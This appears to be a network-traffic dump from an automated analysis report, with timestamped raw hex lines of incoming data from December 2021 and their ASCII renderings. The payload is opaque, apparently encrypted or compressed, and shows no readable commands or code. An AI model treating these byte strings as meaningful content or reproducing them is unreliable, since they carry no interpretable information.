                                                                                              2021-12-13 23:57:12 UTC2396INData Raw: c4 04 0e 85 4e 68 b7 5b 5b 07 92 0b 66 00 93 4d 56 6a 1a 80 ec c5 01 3c 88 87 c5 43 23 01 54 af 36 ea 58 6d 49 3b ac 30 20 07 e0 a7 10 6f e2 15 62 02 59 a6 69 3b 6e d1 ab ad cd c8 99 97 8a 4f 4d 8a 74 91 f6 27 db a5 72 31 59 a0 f3 e3 79 f3 4c 9f aa 9a e1 90 fd ab f7 c3 0b 63 c7 25 45 21 f9 77 b1 68 04 b2 31 7a ff 40 4e 1c 54 b5 41 84 1c 14 b5 bb eb 5e 17 32 53 ba aa 72 ed 77 65 ee 2b 08 23 9c 7e 40 77 8d ad 58 61 7b f2 46 67 75 ee 3a a9 fd 95 bc aa 66 41 7d ce a6 6a 55 86 c5 0b b4 5a 97 e8 43 70 82 ef 63 78 f4 a3 aa fc 04 d9 55 c4 f5 19 88 5c 87 e5 25 76 01 b2 a4 a1 84 da f1 f0 57 14 65 5c 28 13 76 fc ed d1 fd 41 3a 4d e4 60 81 72 74 61 b9 c5 b9 bf 39 fa 53 0e 6a cf 7d 4e 40 19 00 a5 8d b4 63 f9 b5 11 ae a6 61 64 43 d0 a4 c9 b8 e1 7c 25 75 5d 2b 1e 31 3a
                                                                                              Data Ascii: Nh[[fMVj<C#T6XmI;0 obYi;nOMt'r1YyLc%E!wh1z@NTA^2Srwe+#~@wXa{Fgu:fA}jUZCpcxU\%vWe\(vA:M`rta9Sj}N@cadC|%u]+1:
                                                                                              2021-12-13 23:57:12 UTC2412INData Raw: 2c 63 89 a8 2f e1 59 52 96 ba e1 88 7a 7c 21 1c ce 39 a3 57 c9 7c 84 a4 ab 61 e7 8b 26 a0 34 c4 e8 d5 a2 73 71 bb 91 9c 98 3e d2 9c 2a d5 2e 3f 4d 2b 95 74 98 7d 42 8e 61 4e 84 93 8a b2 8f 15 ba 31 c6 d0 b8 eb 5c 8d 52 a4 44 3a d7 b3 b1 1f 43 7d f9 6c ac 5b ae 6a 72 aa 9c 06 ad 17 6f 8c 09 0f 3d 15 eb cd 68 5f b0 b5 0d 0e 23 fb 8f 9b 9c 24 cc ef d6 f8 d7 5a 5b 2e c6 a4 3f 62 38 a7 3a 5c ca 60 7e d0 ef c5 1d 9e 4c ab a2 17 fc 9e 91 d7 fe ef 37 fc 15 ba e4 44 24 72 3b 26 32 a1 01 42 1d f6 eb 04 4c 63 3f 10 9d bb 6d 13 a2 43 f6 eb 2d bb 67 04 95 c1 fa 52 31 04 e3 7f 61 fd 6c 5c 72 4e a2 67 81 08 b1 28 ca c3 d7 1e be 51 1e a9 66 9f 63 ae 34 ca 94 7a 6c cc f3 b8 1f 1c 29 62 0f e4 9e 3e fd 67 09 fb 17 ef 3b c5 64 31 41 d8 02 17 ee 0f 96 66 6a ee 7a 50 7a 65 02
                                                                                              Data Ascii: ,c/YRz|!9W|a&4sq>*.?M+t}BaN1\RD:C}l[jro=h_#$Z[.?b8:\`~L7D$r;&2BLc?mC-gR1al\rNg(Qfc4zl)b>g;d1AfjzPze
                                                                                              2021-12-13 23:57:12 UTC2413INData Raw: 2a d8 b6 4d eb e6 39 98 42 34 fd fe 59 e8 17 1e 67 bf 18 a9 ea dc 9e 6b 67 7e 48 b8 42 b7 9a 52 f1 4b a5 b2 5a be 87 7d bd d9 af 26 59 a3 80 44 a4 9e c5 68 b0 93 b9 90 e0 1c c8 7a f4 33 83 54 40 ea bd 60 40 a6 45 2a bc 02 85 14 38 aa 76 d8 50 79 b5 c9 bc cf 1f 9c ba 97 f1 e5 7f 8f de 9f a3 28 07 c4 3c 5a 04 89 f2 fe f6 dd 05 c9 28 02 0a 28 d6 49 4e 70 32 29 4e ff 36 68 8b 9d b4 f5 7d d9 d8 2e 9c 88 10 99 f0 e0 ff b7 f2 27 3e ba dc 72 06 d9 97 a2 60 7a 57 48 45 d6 2a ba c1 9e 36 be 0d 63 05 df 1a 5b cf 1a 18 45 ba 6d d6 2b c5 8f 66 b2 a0 23 b0 c6 f3 94 b2 fa f5 1c a4 fa 11 24 0a 24 c0 0c 5c 20 38 9e 48 22 bf 20 a1 29 41 09 eb 1a ce 93 95 56 40 5d 47 2d e2 18 ef c7 61 92 68 77 6a ee a4 df be a0 36 9e aa d8 6a d0 7d 39 fd 5c a5 bf e6 dc bd e5 c9 eb ce bc 09
                                                                                              Data Ascii: *M9B4Ygkg~HBRKZ}&YDhz3T@`@E*8vPy(<Z((INp2)N6h}.'>r`zWHE*6c[Em+f#$$\ 8H" )AV@]G-ahwj6j}9\
                                                                                              2021-12-13 23:57:12 UTC2429INData Raw: 20 33 d7 50 b0 06 32 ef 25 1e af 34 95 cf d2 2c 3f a3 80 3c b6 4b d1 f4 f7 38 d0 a5 bc c4 03 23 cd b8 f5 9c 67 99 be e5 35 ff da 77 49 a5 ef 3d 3f 8b 84 f1 d5 7d 28 b5 ed d9 42 bf 90 eb 74 3b ca d8 8f c1 8a 12 4c 98 a4 25 6d 83 fe 10 6a 3d 57 d6 de 20 a4 96 f2 71 a0 6f c6 e8 78 da 27 d6 18 19 34 4e 96 9c 41 cc e1 6b c5 1a 68 37 40 43 34 79 bb 97 ed 92 b0 93 39 fd 23 07 28 8f 19 06 e4 4d fd f9 ae 50 88 f6 47 04 9a df a4 61 72 8d aa 42 d3 1a 97 d6 f8 21 43 dd 94 80 b4 14 3a 1f 12 66 70 03 a4 fc 81 e2 eb c7 1b 90 82 96 17 57 c0 c5 aa 5e 9a 16 cc e6 4e 50 c9 6f 25 b8 43 15 59 35 a4 30 96 43 cf cd 84 bc 63 a3 47 5e 95 f6 cd f3 bc 6f 75 65 2f 2d 28 06 83 45 a4 44 9f dd 3e ad 19 be be f1 68 be b5 2b e7 13 e7 81 4c 82 b6 5d 2e 56 96 fc fb e5 48 2a 51 a1 00 1e 90
                                                                                              Data Ascii: 3P2%4,?<K8#g5wI=?}(Bt;L%mj=W qox'4NAkh7@C4y9#(MPGarB!C:fpW^NPo%CY50CcG^oue/-(ED>h+L].VH*Q
                                                                                              2021-12-13 23:57:12 UTC2430INData Raw: 41 46 6f a0 b4 df c1 1f a2 21 3f ca 03 a9 da 39 68 27 58 78 8e ab 40 71 a9 47 19 04 69 cb 50 06 be b3 5a 5f 26 73 4a 80 ee 4e 1a bb 96 b8 0a eb b8 ba 40 bb 0a 87 39 ca 32 75 20 d4 f4 97 e3 50 fb dc a3 03 ee 05 a4 c6 0e d6 e1 d8 b8 da 97 64 d5 b6 9c 60 82 b5 6b 16 c5 26 d5 01 3e 49 f2 f8 56 0e 05 39 32 bc f7 c5 26 e9 da d9 3f fa 89 1a e0 8a 1f b5 d0 49 34 ee 90 2d fe 11 91 38 b0 73 9e 25 b8 de 73 2e ef fd a9 48 61 87 ce d8 1c 22 fb 76 58 7d 2e a2 fc f7 8f 8e 56 8f 40 3e 39 f6 e5 8c 5e 76 6a b0 e1 2e ed 75 49 38 7a 2a ef ec bb aa 5e f1 9c 72 59 87 d1 0d d5 b6 bb 16 0b f0 f8 75 8e 6b 05 74 06 20 ae 8c 42 9c 4d 88 c7 ee d9 2f aa f0 32 ed 74 ae c0 75 87 15 22 71 31 2b 0e 9e 5c eb be 88 57 d4 39 6f ee a9 cb cf 50 0d aa 76 2d 8e ac 85 cf 52 f8 08 85 b4 1a bb b3
                                                                                              Data Ascii: AFo!?9h'Xx@qGiPZ_&sJN@92u Pd`k&>IV92&?I4-8s%s.Ha"vX}.V@>9^vj.uI8z*^rYukt BM/2tu"q1+\W9oPv-R
                                                                                              2021-12-13 23:57:12 UTC2446INData Raw: a5 d0 0a c8 72 84 31 d7 2b 48 5d 1b 83 6a f2 50 e3 6c 04 49 2f f8 1d 4a 9b fd 87 7c 1b 2d 09 85 e0 51 1b dc 90 ca 78 ce 34 d4 87 13 20 20 3c fd ee 62 88 b9 64 29 95 c5 d2 74 9d 31 bb a1 4f 86 1b 68 d7 32 e0 15 02 f2 e3 e2 89 a8 19 98 4b 32 1c 71 08 45 4b 18 e4 61 f8 c4 4a 7e 15 3b a1 99 6d 8f 4a 57 2b e4 1a 51 3f cb 11 70 b5 17 fc 80 0c 4c 70 8e 19 fb c3 08 27 72 0b 4d c2 03 a8 21 56 3c 14 c4 80 c0 ef de 81 35 10 c6 d3 be 27 aa d9 64 bd 02 97 58 aa 84 66 8a c6 c7 d8 8a 70 ea 92 b3 25 71 6c 34 28 e9 b1 f4 1c e2 5f 48 70 cb 7c 78 61 81 4c 2e 9e 84 d7 79 b7 6d 5d 59 9e a8 32 2c 85 8c d8 61 6a 9a d8 ae f9 00 3f b1 64 41 dd a4 c1 f4 b3 95 e3 d8 79 dd 6b d1 6a 72 f5 e3 e7 b6 08 9b 00 e7 7c af 17 a8 47 1a 35 a6 9d f3 f0 ab b6 c1 36 05 4f a4 f4 ce c2 03 2b 52 61
                                                                                              Data Ascii: r1+H]jPlI/J|-Qx4 <bd)t1Oh2K2qEKaJ~;mJW+Q?pLp'rM!V<5'dXfp%ql4(_Hp|xaL.ym]Y2,aj?dAykjr|G56O+Ra
                                                                                              2021-12-13 23:57:12 UTC2447INData Raw: 0d 75 ad e5 59 5f b3 ed d5 4a 3f ca 3e b9 93 2a 9d e0 84 62 2f 46 7d 2a 48 00 9e c7 a5 b9 65 3e 6b 01 99 24 45 94 74 55 bc b4 52 b6 29 f2 4a 81 b1 e0 e1 09 dc 8f b1 8f 49 a8 4c 2d 4f c5 c5 72 cd 0a be f2 cf ce 12 8c 32 f5 e9 68 cb b5 4b 63 bd c0 a6 c5 59 b0 43 68 58 2e d6 ef 36 37 7e 94 c7 dc 7f 23 d5 2c 44 ae e6 05 a0 da 1c 64 6a 5f 83 3d 89 45 f2 f3 2d 48 e1 a9 a0 68 a7 4e 30 c4 ee 54 bd 73 62 55 cc d8 57 ef 61 f4 11 36 c9 54 3d 3b 18 00 f4 e0 bb 53 d0 5c 03 30 2c 22 ee ef 28 ae c8 a2 62 33 04 e2 3f 28 af 24 b8 d8 17 50 40 1c 99 bb 45 ed cb c4 cf 8c 24 fb e1 ba 81 c6 bd 21 e9 f7 4b 0e c5 f1 4d cc 91 e6 4e fd 3a fc c3 71 91 77 88 4b 3e c8 48 9b cf 04 cd 9f 3a da 3e 37 75 77 61 0b 8e 94 d0 61 85 cb 07 c4 fe 80 c9 c2 bc d2 a4 23 1c d3 5e 63 b0 13 73 d4 cc
                                                                                              Data Ascii: uY_J?>*b/F}*He>k$EtUR)JIL-Or2hKcYChX.67~#,Ddj_=E-HhN0TsbUWa6T=;S\0,"(b3?($P@E$!KMN:qwK>H:>7uwaa#^cs
                                                                                              2021-12-13 23:57:12 UTC2463INData Raw: b2 43 29 a3 57 50 8b cf 65 d2 40 5d f8 19 38 ec 1b a2 ef 79 0b e2 df 02 99 a9 72 fa 37 79 18 c1 e5 e6 6d d3 ec 76 f4 4a 02 1f 93 b1 12 2c b2 85 ca 0c 24 21 04 54 b1 4b 41 7b 14 41 83 b7 b5 d1 62 95 da 88 96 87 d4 ad 8f e7 00 1c f3 de 72 a7 1f 7f ce d1 ee ea 37 f9 94 29 fe 9a 36 90 f4 3d 43 43 0a 97 de 51 7d 6e 9c d4 f2 12 43 ec b5 7a 91 ed 2b 0b 6f 53 34 db cf f1 2a f3 6a 51 52 ec 44 e6 b3 ee aa f4 53 0e e1 b8 2d 0c ca 9f 3b 4f 60 e5 11 16 c2 96 99 a8 c0 9a ac 6a ca 1c 71 55 77 5f 3a 2c a1 36 60 27 57 0b 20 d5 b2 8e 24 e4 e0 63 3e 7c 92 ce 51 13 78 f3 f5 78 14 ea 9f c6 5b 91 51 48 1f 2e b9 f5 a3 b4 dd 26 c2 b0 66 94 a1 80 41 09 e6 6f 08 47 80 73 24 3b 84 c0 73 dd f6 fc 44 d5 39 ac f9 02 2b 70 23 22 bb ab 37 aa d9 d7 c6 3e 1e a1 48 28 d5 e7 d7 a7 64 3e bb
                                                                                              Data Ascii: C)WPe@]8yr7ymvJ,$!TKA{Abr7)6=CCQ}nCz+oS4*jQRDS-;O`jqUw_:,6`'W $c>|Qxx[QH.&fAoGs$;sD9+p#"7>H(d>
                                                                                              2021-12-13 23:57:13 UTC2464INData Raw: ec 95 9b d2 fd c3 80 ca c1 2d 18 3f a3 56 b2 52 bb ac a4 12 0f 4d fd e4 e1 13 32 c3 c3 f9 f6 b5 9f 55 cc d6 28 e3 4e 1d c9 54 34 b0 9d 61 32 86 f2 cc bd 49 70 00 32 ee 87 7a fc 70 bf 2f 11 59 45 1c 78 c5 c8 5c cb cb 3d fb 74 d3 42 5c f3 46 5e 81 29 e5 90 2c 04 e9 60 53 a7 47 b5 67 1b 77 7f 3a 03 99 c8 0d eb 17 74 45 a0 18 3b 3b a0 4a 3e 8a ac 79 b7 81 13 3f fa 6c 41 c8 9e a7 98 24 50 e5 d7 02 82 b0 6a 1b 66 da 9f 45 3e d2 95 e0 5c 37 20 18 24 e6 84 c9 17 cb 68 43 40 c6 e9 35 7f 22 f3 6a 43 6d f4 8c 1d 21 3d c7 29 98 09 c8 b9 49 28 5a 1b 97 f8 f6 73 af 14 d2 bc 7d 69 cd 78 ce a5 1c f5 62 fb af 29 66 f4 89 4a 76 70 f6 14 92 c2 c8 e5 15 9e a3 67 2c 3e 50 d5 3e fa 66 3d 3a e4 fa 76 1f 86 ad 25 ba 9d 77 b8 a2 77 82 17 b8 54 28 b9 e5 c0 6f cf fa 60 c0 34 00 d4
                                                                                              Data Ascii: -?VRM2U(NT4a2Ip2zp/YEx\=tB\F^),`SGgw:tE;;J>y?lA$PjfE>\7 $hC@5"jCm!=)I(Zs}ixb)fJvpg,>P>f=:v%wwT(o`4
                                                                                              2021-12-13 23:57:13 UTC2480INData Raw: af 9b 5a 3c b0 88 15 e6 a9 8b be 40 1d c1 ca 91 d5 0f 77 67 5f a8 0a 51 af d7 78 ce a2 d6 4f 3a 5f 0c 0d 90 a0 e6 6e 03 a2 df 24 b2 7e 27 21 ed 17 97 17 1a bf 94 25 f6 0e 3c de 21 c3 84 64 be 60 13 0d 6e fa 87 c9 a9 25 a4 c3 c6 cd d7 dc f5 4f 61 5f 69 36 c9 9a 6c 64 eb d8 ce af ac 49 6b c2 1c 88 42 fe bd d3 de 43 e7 4c c2 22 ef 70 b9 90 c8 6a 44 67 d0 01 62 07 6f db 48 a7 1a ae 13 9c 42 3e 8c 31 89 42 0b 0a d2 33 9b 2a 84 13 cf bb 53 36 e7 b4 72 38 7f 47 12 76 a2 55 56 8b 2b be 42 f0 c1 65 61 68 17 cf 20 e4 72 31 df 9a 8d 1f 59 84 95 59 86 e9 8c 49 99 de 77 22 f9 b8 4e ee dd b0 a6 b2 fb 78 fb d9 f4 a3 7a 71 2d b5 6e 7e ab 37 15 1c 4f 6f fd 87 1d a4 c6 d8 da 63 34 22 50 cb fd 27 94 83 71 43 7b 66 d3 1c 1f c9 5c c9 0d 6a b1 84 ff 1b 93 f9 32 a4 b2 2b 62 ee
                                                                                              Data Ascii: Z<@wg_QxO:_n$~'!%<!d`n%Oa_i6ldIkBCL"pjDgboHB>1B3*S6r8GvUV+Beah r1YYIw"Nxzq-n~7Ooc4"P'qC{f\j2+b
                                                                                              2021-12-13 23:57:13 UTC2481INData Raw: fa df 3f 54 54 e9 37 e2 7f 38 bf 40 6d fb ba c5 67 9e 6d 37 99 bc d9 da e0 36 dc a8 11 54 70 29 e1 b2 11 30 cc 48 f1 40 4d ad 92 0a 58 ce 4d e5 72 e4 86 d7 00 94 5e 0e 29 3b a5 1f d5 5d 8a f5 da 61 67 fd 06 c2 db 51 a9 6f 72 34 21 c3 5d 55 d2 ac ad 28 50 f4 08 a9 aa 47 a1 ec 09 a0 98 35 a3 7d bf 76 1f 05 0e fe 74 7d bf 4d fe d8 d1 b5 b6 10 d6 d6 1a ac f4 f4 ad d9 1a 1c 24 49 dd 1a 72 cd 45 a9 12 a7 87 36 cf 0f 8a 3e 43 bc 6c c9 34 51 6e cb 69 78 5c 67 97 70 e7 9c 57 6a fe bc 58 52 4d 7a ec f4 35 fe fa e3 39 a7 00 bc 22 1f c2 b2 f8 16 d5 fa 41 8e 4f 64 6d 46 79 10 1d 98 b0 48 5d f8 17 3f 2a f0 a3 e3 fd c4 e1 7f ba 4c 8b f7 aa 61 1a 5b cf cd 29 35 d5 98 41 8f b5 c9 38 20 55 5a c4 96 1a fd b5 77 25 05 bc b4 60 cb 02 e8 11 42 9b fb fa 9e a2 ef e1 f5 59 17 80
                                                                                              Data Ascii: ?TT78@mgm76Tp)0H@MXMr^);]agQor4!]U(PG5}vt}M$IrE6>Cl4Qnix\gpWjXRMz59"AOdmFyH]?*La[)5A8 UZw%`BY
                                                                                              2021-12-13 23:57:13 UTC2497INData Raw: af ea 9f 71 cd c0 41 d1 e3 9d 88 4a ff d0 d6 e6 2b b0 fd 19 84 77 76 c7 41 bf 5d a0 27 a7 ee 95 4f c9 fb 35 73 53 81 f5 96 7c e7 c2 a0 bd 2e 7d e5 fa 76 7c c8 ce b3 1b 00 85 5d c4 8b 11 05 1e a2 10 97 71 0f 60 9c d0 7f 79 93 fa 57 59 31 a4 92 ca 17 2d a7 0d 04 4a 83 33 57 f5 1c 78 96 5c 70 f9 bc c5 68 24 7e 64 27 12 ef f4 c6 da 24 a1 05 4b e0 f1 2e b8 3d 70 d2 1f 44 a6 49 2d 3f 74 ca d9 ec b7 14 bd 91 b7 1c 9c 51 63 1c e8 ba b5 b6 e5 9e fa 78 2b f7 e4 e7 b7 e1 9c 19 24 04 68 b0 2d 6e 3f dd c8 74 c7 50 f7 be ec 4c ef a5 3c 4e 26 08 d8 6d 8a 16 ea 3a 8b 15 86 f3 3e 12 2b 2b b2 1f be 5a 05 f0 f1 ad dc 76 88 80 2b 7a f3 e8 55 2b eb e7 0e 13 fd 80 c9 ec 16 a7 1c af bb e2 77 46 13 83 dd 08 07 0f 51 1e 82 36 07 6e 4b 66 74 e1 63 80 9a b7 be 69 01 ad 1a a4 bb bc
                                                                                              Data Ascii: qAJ+wvA]'O5sS|.}v|]q`yWY1-J3Wx\ph$~d'$K.=pDI-?tQcx+$h-n?tPL<N&m:>++Zv+zU+wFQ6nKftci
                                                                                              2021-12-13 23:57:13 UTC2498INData Raw: 3f 70 6c 7e 53 38 a6 5f 62 e8 09 9b e3 16 e3 2b 95 03 b4 dc f9 95 c7 87 47 2c 3a 2b 4c ca 9d 4c fc 14 08 3f 10 dd db 2f 81 a5 3d 6a 42 21 de 5c 3b 68 6a 0a 16 b7 6b 72 3a be dc a9 9a 33 32 eb ee d4 98 e3 4b 16 14 97 27 77 3b 02 ef 45 2a 9f b3 78 ff 03 8e f1 5c e1 54 25 39 14 9d 12 3c ef 3f e5 ba 9a 38 28 ef 48 bb 33 27 55 ba b5 ec 83 77 6c db 97 87 26 fc 39 5a a1 05 95 7d ef 81 de d1 17 cc a7 07 cd fe 0a bb 4f b1 1d 8d 73 6f 41 69 41 b3 2d 42 17 6b 73 f0 8c 5d 4a 23 4f bf 63 79 62 81 45 fc 6a df 3a e0 da 73 70 95 66 fc 70 4b c6 b6 ec 3a 12 7b 98 8c 3c a8 9f 7f 9d 98 24 3c 49 cc 06 4a a6 c5 49 0a 73 af 3a 21 5f ab 20 cd 93 2b 62 78 f9 8c 85 59 94 b0 1f 15 1a 41 be 54 4e cf 4f 65 d0 9c 63 fa 3d d0 c6 99 e5 60 40 37 18 04 fc d0 60 ef 21 9e 5a ce f9 f7 53 58
                                                                                              Data Ascii: ?pl~S8_b+G,:+LL?/=jB!\;hjkr:32K'w;E*x\T%9<?8(H3'Uwl&9Z}OsoAiA-Bks]J#OcybEj:spfpK:{<$<IJIs:!_ +bxYATNOec=`@7`!ZSX
                                                                                              2021-12-13 23:57:13 UTC2514INData Raw: bc e8 46 83 c1 00 bd c3 fc 56 76 0d 09 f8 4d a6 61 89 1e c9 bb ef 00 9d c8 bc 8d f7 a2 47 27 b1 eb 64 79 4b 2a d6 31 2a fc 9b 14 3a 26 2f ac 29 e9 be d9 ec 40 c3 9b 47 5e 9a 57 cf ba 77 73 ec f5 30 83 93 32 20 38 67 57 b8 b2 3e 30 89 4c a3 f3 78 5f 7b 9c ae 1b 2d 73 d3 37 a2 46 a4 7f cc 1e 6d d9 e6 ea 05 31 e7 04 8a fe 3e 6c a3 28 4e 3e cf 6d 06 f9 27 e2 f0 3e 5f dc 49 52 53 f8 fd b5 79 78 88 b5 ac 47 2d b4 82 c7 82 62 88 79 1b 18 b2 bf c1 fe 05 4c f4 28 8e 97 f0 a5 a3 6f 74 f5 bd 5d d4 69 2b a9 c8 65 ab c1 9b e2 ce dd ca 68 b1 79 61 ce ac 78 cb dc 57 6a 11 a8 e2 9a e6 98 8b 54 ff db 1b 94 5c b3 07 fb 67 fc 0c 5b d0 77 07 0a 4a af f7 c2 9d fa 4f 48 5a 77 2d 99 bf 70 79 80 97 e2 b5 4e 70 d3 31 71 4f 0c 4e b1 5c e8 7d 67 f6 29 3d 1e 2e 75 78 3b 15 4c c6 81
                                                                                              Data Ascii: FVvMaG'dyK*1*:&/)@G^Wws02 8gW>0Lx_{-s7Fm1>l(N>m'>_IRSyxG-byL(ot]i+ehyaxWjT\g[wJOHZw-pyNp1qON\}g)=.ux;L
                                                                                              2021-12-13 23:57:13 UTC2515INData Raw: 5f 19 53 c9 f4 75 1b dd f6 8d 9c 3a 78 54 47 d3 33 67 71 48 dc 34 9a f1 00 09 ef 58 f6 67 7d fb 5d 63 1a 4c ca 0e ed 8c 73 82 c8 a3 00 0c 10 46 2a 00 83 7e ed e3 34 f2 f4 03 7e e0 d7 f4 f8 f8 de 62 d3 7c 9f b3 7b fb e5 14 95 a5 76 f1 ea 65 2f 29 f6 f1 6f 1c a0 99 8d 1b ed 2f 72 b4 c8 ae b3 98 6d 65 c1 90 9c 47 0c b8 d3 b8 40 1c ea a8 18 85 dc 25 86 82 97 16 ae 47 32 28 8f 0f fd ed f6 dc 4a ab 02 04 da 80 c4 f4 09 2a 38 f7 6c 4b da fd 78 9a 2e 10 8c 66 75 08 f2 60 b9 0c 50 d1 35 01 a7 1a 09 04 1e cf 06 4e 5d 2e 33 69 b7 b6 5e 17 24 ad 7d e9 90 1e 82 0e da 42 28 5c 44 63 21 1c 11 8e 0c 92 12 6d 6e 06 44 b2 ba e3 e1 fe 38 5c 34 90 61 35 19 c0 70 b0 92 86 a1 7b cf 87 ed c0 7e d2 a3 91 85 76 2e 45 d2 6f 85 8a b0 60 56 9c ef b4 b7 e6 f3 24 29 b4 c2 4f 77 f9 c1
                                                                                              Data Ascii: _Su:xTG3gqH4Xg}]cLsF*~4~b|{ve/)o/rmeG@%G2(J*8lKx.fu`P5N].3i^$}B(\Dc!mnD8\4a5p{~v.Eo`V$)Ow
                                                                                              2021-12-13 23:57:13 UTC2531INData Raw: 20 80 36 f7 8d ee ff 0b 03 70 3f 41 a1 cb 7c cb 86 e4 ff 08 ef 31 1f 33 ff 4a b9 4d 9a 05 0f a7 5c 26 fa 4c 24 2f fb ef 3d c0 cb 38 a2 bf cd fd e9 68 3d 69 cd 09 c5 e3 04 53 28 3a 64 c4 42 db 9f 45 55 d3 7c e6 bf d2 f5 2d a4 25 ed 89 ed 28 8f 10 b0 ff cf 89 e7 76 76 73 b0 ad 3f 94 8b 87 43 1a 14 a4 9f f5 7e 9a a0 c2 64 74 4e b1 b9 8c 6c 4b a4 0a 4f 4c b3 83 3a 6c 49 ce 5a 5b af 69 4e a1 8d df 91 2a c5 c2 95 ab 2d ee 2d 48 92 54 dc dd 8a 97 79 fa 81 84 4b 9d 83 55 d4 3e 98 9e 46 a2 d8 5a d7 6e fd 8e 86 ba 23 fe 8b df fc 11 fe cd ee c3 aa 0e b2 60 ff 15 51 7c 58 23 1d fe 10 0b b0 1a cb 18 7d 42 b3 c7 28 b7 32 0e 99 81 30 52 4c a6 07 1c ea 85 e6 c0 57 ce 83 26 9b 0c e7 f4 07 8a 6b d6 15 3f d8 8f 60 91 c5 7b d5 db 0c a1 07 af c8 9a b0 19 2c 97 68 2d ba 2c cd
                                                                                              Data Ascii: 6p?A|13JM\&L$/=8h=iS(:dBEU|-%(vvs?C~dtNlKOL:lIZ[iN*--HTyKU>FZn#`Q|X#}B(20RLW&k?`{,h-,
                                                                                              2021-12-13 23:57:13 UTC2532INData Raw: 62 82 c9 55 23 cc cd e3 1a 6e cd 76 9d b8 be 84 84 95 39 99 b9 e2 20 9b bc 67 72 43 99 19 c7 67 99 1f 54 9f 23 2d 56 bc b2 9b ca 44 f2 3d 18 12 b3 4d a9 ff b4 b4 d6 7a 14 11 d6 37 bc 9f 28 79 07 04 81 f2 6c 03 ff 07 90 a3 04 ee 09 ea d8 8c f1 c4 aa 99 95 12 7d 2b 73 8d 2c 75 97 70 d8 16 93 18 a1 3f ed 77 cb a4 ac a4 00 97 81 7c 2c d0 59 e2 7f e1 89 97 0a 63 e3 cc 9c 8c 99 10 7e e9 68 ba 8b 8c 01 be 78 14 19 af 96 35 d9 2f a3 bc a3 3b 47 3d 9c f2 4e f5 1e 79 c1 9d b6 3f 0a e6 3d 4e f3 d9 91 ae 92 9d ea 58 53 d2 ae da 4f a5 fc b4 e3 8e 62 ae e3 98 90 0d 13 8c be 94 bc 4a 0b 90 ba 8a 83 f1 e6 42 fe dc ff af a8 ea 5b 5e d6 fc 36 bb 9a fb ce 25 7b a9 14 09 ea 32 19 42 50 18 ea f6 78 48 4e 1a 0f f3 b6 98 1e 53 91 65 94 4a 37 a4 28 a2 c1 8e 15 7d 21 2b dd ef 60
                                                                                              Data Ascii: bU#nv9 grCgT#-VD=Mz7(yl}+s,up?w|,Yc~hx5/;G=Ny?=NXSObJB[^6%{2BPxHNSeJ7(}!+`
                                                                                              2021-12-13 23:57:13 UTC2548INData Raw: d2 6e 2c 37 9f 80 63 9b 00 3f b3 2f 30 b9 5a d1 82 5f 45 57 25 a7 25 b3 d2 91 a9 ff 22 34 46 cd 67 f4 4f a7 f6 5b 09 d8 a6 d0 87 2d d9 f6 e3 5e cf d0 a8 41 a8 3e 23 28 cc 5d 0f 6b ba fb 14 57 7e 1b 68 15 ec dd f6 01 89 9b 94 cb 03 60 0a 22 26 6e 9d 3e c7 f7 fd 87 65 64 76 27 3c 00 07 19 9b d9 7e 1e 9f a2 c5 68 3b d8 19 4e 6f 74 36 fb 56 ad be 9c 56 19 01 71 f9 c0 87 bf 09 3a bb dc 09 24 f1 3c 46 01 7e 46 b8 bf 20 70 b4 2e 56 e3 00 de 55 1f 7e d0 9d 82 6a a1 a1 30 4e 9a ae 36 58 1f 3a aa 74 9e bc 52 5d 73 85 77 d8 e0 bf 63 17 44 3a f2 bf d0 91 e6 51 6a fd c5 3e 49 f1 59 da 61 74 72 f6 b1 91 93 2c 3e 9b f5 68 9d a1 5d d6 70 5d 08 0c b9 ac 44 9f ec 8a 53 a4 f3 d2 ba 79 67 b2 2e 76 12 ee 0e 4a 67 cd dd cb f3 67 14 d7 30 d1 05 49 f0 b2 1a 62 a3 81 a9 87 b0 c2
                                                                                              Data Ascii: n,7c?/0Z_EW%%"4FgO[-^A>#(]kW~h`"&n>edv'<~h;Not6VVq:$<F~F p.VU~j0N6X:tR]swcD:Qj>IYatr,>h]p]DSyg.vJgg0Ib
                                                                                              2021-12-13 23:57:13 UTC2549INData Raw: c5 c9 48 05 dd 05 12 66 13 04 a5 e2 0c 26 47 ac 06 39 c2 d7 46 13 3c 76 54 02 ae df 9a 77 9f 17 82 2d 73 c8 0e 2b 69 09 9d 5b 2b 0e d7 0e ba e7 52 b8 61 7c 1f e7 6a f5 94 61 c8 49 97 6e b4 4d 4e 92 6d 4f fd 52 53 95 26 26 80 1e 3f 32 f4 b7 e3 15 51 87 92 e1 03 6c 0d f5 88 91 2e 44 68 88 97 28 93 d0 45 b7 36 c6 e2 ad c9 9d b8 a6 3d d2 89 d8 2b f5 25 b7 96 68 b2 69 41 88 f5 d3 ad 78 1e 06 21 4b 95 2d ba 27 a0 da 1f 47 44 a1 3a 9e 4e 36 2f 34 86 d5 66 70 05 5b c4 ec af 16 ce 32 f0 1e 23 74 ce 43 4a 89 54 03 46 dd aa 1c 85 68 8e 3a d6 52 a4 6c 5b 39 7f 55 c9 8d 7e 4b ae 30 4f fe d9 31 0e 46 af 50 de 0b db df f0 d8 a0 4a 0e 16 86 d7 2a a7 cd b4 65 c8 89 0d 2c 91 ee 60 5c 17 54 02 e4 b0 d1 84 0f 73 a6 7d 4a 65 7d 54 86 52 18 13 d5 c1 07 62 ad 34 89 5d c4 cb 91
                                                                                              Data Ascii: Hf&G9F<vTw-s+i[+Ra|jaInMNmORS&&?2Ql.Dh(E6=+%hiAx!K-'GD:N6/4fp[2#tCJTFh:Rl[9U~K0O1FPJ*e,`\Ts}Je}TRb4]
                                                                                              2021-12-13 23:57:13 UTC2565INData Raw: bc 87 33 95 4c a7 15 ea c4 7b 41 cd f8 05 2c 01 3e b1 95 9d 8e 31 e1 af 21 92 43 47 9a 74 cc 7b ac 13 c8 0a 8b 36 b4 60 d4 e8 e7 d5 28 29 be 81 d8 90 7d 24 c3 dc 80 ce 55 71 f1 e9 9d 26 01 a0 06 23 2c 5c b5 08 95 50 7b 65 32 54 92 c7 e6 1c 8d 7d 4f 70 57 98 7d e1 b4 a6 63 fb 33 6d 8d 4d 03 4f 3c f8 ba 55 75 f0 70 36 51 4c a0 bb e1 a9 ad 40 68 6e 0a 70 5c 20 2b 52 93 4a c3 c9 ee 09 8d f5 26 87 cb 46 26 a9 3b e4 34 54 80 a1 74 fc 38 b5 52 65 40 41 45 d2 8a 3b d9 9d 04 07 83 b2 a0 98 d5 6d 87 5d 3a d9 d2 00 f8 2e 40 de a8 b8 25 f9 16 28 14 42 75 73 41 25 